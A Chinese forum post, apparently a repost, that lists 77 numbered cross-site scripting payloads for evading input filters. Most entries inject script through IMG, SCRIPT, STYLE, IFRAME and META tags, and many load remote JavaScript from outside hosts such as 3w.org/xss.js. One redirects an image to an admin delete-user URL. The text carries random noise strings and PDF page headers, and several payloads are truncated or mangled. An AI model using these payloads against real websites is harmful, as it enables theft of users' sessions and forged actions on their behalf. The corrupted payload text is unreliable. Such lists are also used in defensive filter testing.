貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。# ]: K$ i7 F: C4 p, q: x
(1)普通的XSS JavaScript注入: y$ [* i/ B$ C' q- z7 x
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ B6 G& Z. I& [- s8 |: x+ f
(2)IMG标签XSS使用JavaScript命令
- g+ ?8 S7 r7 r% N/ E<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># P1 T6 ?7 ]+ g& |; M
(3)IMG标签无分号无引号
7 F P. o, Y( p( ~6 T# B<IMG SRC=javascript:alert(‘XSS’)>- u8 w! T' a+ [
(4)IMG标签大小写不敏感
' E2 I1 ?( C7 r7 q, E" @! W$ Z0 q<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: Q. {$ F- Q- X(5)HTML编码(必须有分号)/ r$ d: [9 t! a$ \1 M y
<IMG SRC=javascript:alert(“XSS”)>- ~9 ~) B/ b# C% S! |+ {& j
(6)修正缺陷IMG标签
! E: Y# q* T7 y) s- a8 d; ^5 D<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>5 S( e6 K, H& b2 `6 P4 N: M. K* ~- \
' i# @5 }0 i+ _+ H& b9 W# D& ]
$ E4 i+ t% E# B2 q6 Y$ j
(7)formCharCode标签(计算器)
/ t& l, l' ]4 w3 b! i; ^$ n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& E/ t- b( ~' N$ Y' h. T1 r# u(8)UTF-8的Unicode编码(计算器)
3 A' X7 n- b) k<IMG SRC=jav..省略..S')>
! O5 f4 |/ o, c5 O(9)7位的UTF-8的Unicode编码是没有分号的(计算器)( }$ a6 j4 o; K6 _8 U3 Q M! D
<IMG SRC=jav..省略..S')>
6 a. h7 l+ @$ y0 J* G(10)十六进制编码也是没有分号(计算器)' N+ G$ e' f K3 t
<IMG SRC=java..省略..XSS')>' p0 d& X+ }4 y/ x
(11)嵌入式标签,将Javascript分开" m% s1 y; J( s& n% w6 A6 F: t# O
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 p# ?0 [) W6 G9 x* w N/ c9 H) O* l
(12)嵌入式编码标签,将Javascript分开 B2 U+ x. A; M8 A
<IMG SRC=”jav ascript:alert(‘XSS’);”> Y* F! t; g8 O1 t; L
(13)嵌入式换行符
+ D" @/ C+ t* f' D- b+ R1 P<IMG SRC=”jav ascript:alert(‘XSS’);”>8 B0 P1 U+ X/ Z- o1 W8 R
(14)嵌入式回车5 I- \$ v0 J$ ?9 x* U
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 z% ]9 w9 m: o2 ]& U
(15)嵌入式多行注入JavaScript,这是XSS极端的例子, y# j' O% C' S
<IMG SRC=”javascript:alert(‘XSS‘)”>
" k( i4 _/ @) V9 P$ c/ p& u5 p9 x(16)解决限制字符(要求同页面)" t1 n0 C( T, C& h& Q. o
<script>z=’document.’</script>; u( I+ r- S$ Y+ K0 }$ ^$ k- K! g
<script>z=z+’write(“‘</script>
, n+ @3 A5 G/ ^+ H; ^, ~+ E9 F<script>z=z+’<script’</script>9 T5 r Z& F9 T- v
<script>z=z+’ src=ht’</script>
$ ^, ?+ i; h% P* l I<script>z=z+’tp://ww’</script>, J, c8 Q7 w/ k6 {
<script>z=z+’w.shell’</script>
- ?2 K. H: M! `$ W1 h! R/ M2 t5 ^- x<script>z=z+’.net/1.’</script>
9 S( |! }" c( u( ^<script>z=z+’js></sc’</script>: v. O z! H$ i0 t
<script>z=z+’ript>”)’</script>
3 }' u+ B) i. `$ M& Q* ]2 D/ `) Y3 ~<script>eval_r(z)</script>
4 t: L! I y. A3 H# S(17)空字符12-7-1 T00LS - Powered by Discuz! Board1 \/ F% \0 Y, E" A
https://www.t00ls.net/viewthread ... table&tid=15267 2/64 `$ ~" [( g3 S# b# t1 K. G# z8 w1 a
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out. i3 r! \# F0 `( q
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
8 L/ ?( ]" N2 I" e6 ~! [4 eperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
+ a, i+ g3 a# q4 ?4 c* ^(19)Spaces和meta前的IMG标签
/ V+ _% U! D/ r<IMG SRC=” javascript:alert(‘XSS’);”>+ Z5 N7 V+ c1 ~
(20)Non-alpha-non-digit XSS
# v8 M" }0 G. W& n* p<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ b; v M d% I. z
(21)Non-alpha-non-digit XSS to 21 i" w1 c) k( T# H3 r, J
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 m ]; A6 `2 @& e9 V
(22)Non-alpha-non-digit XSS to 3
, N0 s6 D: p! n9 D6 S<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT> \/ U, R% I W
(23)双开括号
) ^; q: j: d% O" X. q<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! K/ a( [- w X* M6 B(24)无结束脚本标记(仅火狐等浏览器)- f, |5 A9 D, s
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>( H+ Z; A' J8 G' j
(25)无结束脚本标记2& v) g; J- g* x* W/ X' x8 Z
<SCRIPT SRC=//3w.org/XSS/xss.js>
* H' c3 d4 J2 h. l0 N(26)半开的HTML/JavaScript XSS
9 L `5 D. o$ A# z4 Q: H3 Q<IMG SRC=”javascript:alert(‘XSS’)”3 U, h8 u3 T( s9 J/ u" x
(27)双开角括号9 L% }6 \+ B, j" n0 w. ^" {$ T8 Y
<iframe src=http://3w.org/XSS.html <. Y- z9 ]5 ?/ H) i6 V
(28)无单引号 双引号 分号
( J$ t" Q" Y# {: t<SCRIPT>a=/XSS/
0 X6 B9 a0 Y2 ~( Balert(a.source)</SCRIPT>7 D( m' J# [2 O, L; S, R
(29)换码过滤的JavaScript7 B8 g/ [& d- `/ v6 y
\”;alert(‘XSS’);//
( G4 ^: v6 I2 Y9 w# M+ n(30)结束Title标签% {4 w3 |/ n4 j1 O/ h3 r
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
; V, `/ W B' P, B. c* r) g(31)Input Image
9 @( c7 H9 P# @, |0 f<INPUT SRC=”javascript:alert(‘XSS’);”>1 v7 x" e! f- U# k: G' a
(32)BODY Image/ B3 X L! m& T5 x5 e5 t& h
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>0 a0 {) z8 X- U- v3 i6 r* h4 X
(33)BODY标签
3 z/ n0 t$ \8 x( O0 R<BODY(‘XSS’)>
. P' ^5 [7 E% i' ]6 _* _) ?2 c(34)IMG Dynsrc* y6 Z! u4 C7 g
<IMG DYNSRC=”javascript:alert(‘XSS’)”>0 i! x' Y& L. Q2 {# H9 V
(35)IMG Lowsrc
, Q j+ [; \3 N5 B<IMG LOWSRC=”javascript:alert(‘XSS’)”>
- M; g' q, G5 N4 {7 n(36)BGSOUND) |# N+ {$ o. y8 V5 S
<BGSOUND SRC=”javascript:alert(‘XSS’);”>* Y2 {- I$ S a8 a+ v5 \ D
(37)STYLE sheet
, Q( K6 e* [6 e<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
9 o! e: D3 ~) o4 G% ?/ _7 g; B2 W(38)远程样式表
' d* H0 i) L j5 i( W<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>& t3 ]/ ^1 j8 T" z) }5 g d9 d6 P
(39)List-style-image(列表式)/ `+ D5 i! y/ G
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS" i5 Z2 H" K7 x) A9 R
(40)IMG VBscript
% \! ^1 ?$ d; \<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
% @, C6 m. p; w(41)META链接url
6 `$ f- T$ e$ T. v& B5 P2 N; v% Z) m$ |6 a' ]7 d/ Q+ y
$ S v8 s8 `9 v6 O$ }$ K9 e
<META HTTP-EQUIV=”refresh” CONTENT=”0;
- C% s$ p+ O0 V; P- u: nURL=http://;URL=javascript:alert(‘XSS’);”>
; ?8 s2 _, X* L! h8 {(42)Iframe) T" ]" g3 w5 G! T) f ^
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
5 ~* y$ T' Z) _: N( f5 D(43)Frame7 b1 n# w, F- ?5 U# J& _
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
5 _) i# p; b& b; K* Z# ~3 N' Vhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
) j2 a# ?) j- u. C) V(44)Table2 e1 k" l/ }/ f6 s; d
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>2 |8 \; j+ f K+ `+ Z& ]
(45)TD' ]) B& ]7 _4 ?0 ?# q6 l; N
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* B; g5 Q9 T6 t$ {$ z
(46)DIV background-image9 l, U( S7 L8 \+ D% t0 U; H: q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 o! I6 s) K4 U% c! [* o(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-1 n8 h& `7 r) n# R$ K8 a* F. r) v
8&13&12288&65279)
2 J- P/ F C/ } Z8 Z8 M4 [5 ~" M<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> q8 i: y, X3 h. P( a
(48)DIV expression2 E! M5 _6 \6 q
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ ^2 q1 t8 I' b! a* D; e8 _(49)STYLE属性分拆表达' d9 N! ^0 W6 F, F7 f7 N" i u
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
3 c4 ]+ C2 `: {9 b' B4 w(50)匿名STYLE(组成:开角号和一个字母开头)+ I( F7 V$ x; S( x2 V8 S4 q
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>; r# i( o1 E1 c" L: N) a) N; u
(51)STYLE background-image3 \* Q) T8 Z I0 l- H
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A* P' D+ l g# l) O" I1 i
CLASS=XSS></A>4 J: D y/ D+ ^* |; m9 T- C
(52)IMG STYLE方式
" F( c6 [4 V4 W! B! m! fexppression(alert(“XSS”))’>) b' \9 Z, _6 {, ?
(53)STYLE background5 {; k+ S' z0 Y1 e
<STYLE><STYLE
4 p: }5 C9 g! \/ q* M, f* Ztype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>9 ^% l8 b/ {, M! o8 j$ j* }
(54)BASE
" r) l* A9 G4 c( M- ~" a. H4 [; r<BASE HREF=”javascript:alert(‘XSS’);//”># l" n* Z3 j, o. p' e) D, w
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 A- ~& ~. I. K! t<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>" A: m1 y0 P% }/ S3 {6 o
(56)在flash中使用ActionScrpt可以混进你XSS的代码
+ B. X$ v. r% r$ S" K$ pa=”get”;: Y3 d6 k- H M4 v( F' }* ?) G
b=”URL(\”";! k8 j; s* X7 W) c" ?* ]) X
c=”javascript:”;' A; [; M7 ?7 J6 ^1 n5 ~9 Q1 b
d=”alert(‘XSS’);\”)”;; c# J# L3 M3 Q& a+ O; {) Y. M3 ^
eval_r(a+b+c+d);
. P/ O: u3 L; w# c+ e \! Z% }(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上. G" p: S0 B' F/ L
<HTML xmlns:xss>
: E1 ^; W& C0 n1 w* i<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>1 G- y4 L' e0 C% A
<xss:xss>XSS</xss:xss>" }* |' |0 h6 k" i
</HTML>
; i! q. J: ~5 q- w p6 D* _(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
# Y1 s) I' _8 C7 G4 B+ O7 D8 Y<SCRIPT SRC=””></SCRIPT>
7 U6 u1 Y3 r/ u2 C, @* t# ]# m+ Q(59)IMG嵌入式命令,可执行任意命令. G @( ]2 l7 }' z+ ^3 V
<IMG SRC=”http://www.XXX.com/a.php?a=b”>$ J7 ?* a& u9 c4 b
(60)IMG嵌入式命令(a.jpg在同服务器)1 M( j W8 H5 y9 O( i l6 U2 L4 I
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser8 g8 C7 U, z4 n6 i& p
(61)绕符号过滤
; z7 U8 B0 W' {<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>* B, N8 v# Z2 n2 V8 p" A
(62)
; w5 X1 _ y* H4 z5 ~; L<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) Q% D. P) |* o4 I k/ p5 a(63)6 E1 T! F0 Q/ h
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>6 R( q" H: Q1 M: M1 Y B: F7 \, p% l
(64)
3 u+ F. b+ g: H# K) s+ N$ J" S' o<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
* ~. t9 g; {, z+ g9 L4 O(65)
% O8 e1 k+ Y/ l- t, m- f1 H+ B8 Q<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
! J1 Q: _' s& R) i# i0 Q V(66)12-7-1 T00LS - Powered by Discuz! Board
! w1 B0 p8 m9 dhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
5 o6 C% s9 y) p, M<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>& h( |0 B! o$ U: t
(67) J. c5 _! N" |1 _3 [3 d4 Z
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>+ c& x9 L4 y5 t7 }
</SCRIPT>" I( G8 M. I+ C2 }, R
(68)URL绕行
; U5 I. ~' D% X. b<A HREF=”http://127.0.0.1/”>XSS</A>. M3 N% j' t5 \
(69)URL编码5 |2 O" f4 h3 a9 T( e u7 U6 ~
<A HREF=”http://3w.org”>XSS</A>
$ K1 i( l- z! ~, v(70)IP十进制: b/ p. u1 n- E( a6 r" q
<A HREF=”http://3232235521″>XSS</A>8 O% [3 G2 T/ ^* s
(71)IP十六进制
9 a) i- P* j2 Y8 ^$ b<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>9 e9 _4 @: i: L
(72)IP八进制1 S) n5 |% y: Y) d; n6 C
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
! Y B+ L" j( f" V' N% H(73)混合编码2 ~$ F' q$ W8 a5 n& Q8 L
<A HREF=”h
, `* S) q+ D, o+ U6 b- P5 G$ Q9 |; qtt p://6 6.000146.0×7.147/”">XSS</A>6 K% H2 P# ?# j2 {% E! k# I3 f9 Z
(74)节省[http:]
4 s g T7 T( E1 K1 q/ K/ N0 Z<A HREF=”//www.google.com/”>XSS</A>* y4 P3 m5 o. Q& T- _
(75)节省[www]8 u/ @% o' X& j2 M4 V
<A HREF=”http://google.com/”>XSS</A>
2 t# e+ Y8 d; ]$ H _(76)绝对点绝对DNS
& b0 \ ]2 r8 y7 R. Q<A HREF=”http://www.google.com./”>XSS</A>$ \# T" x2 z/ G3 u
(77)javascript链接9 v; P/ @; |6 Q8 A( [2 f0 M
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>: K* j, c9 S, r' A. b3 ]8 M
/ \+ C' P& n P9 V- p) A4 E5 n; T
原文地址:http://fuzzexp.org/u/0day/?p=14; _/ u: K: L& N; X; g
' N0 J+ U8 A/ n4 y6 J" K( I
|
发表于 2013-4-19 19:22:37
收藏
支持
反对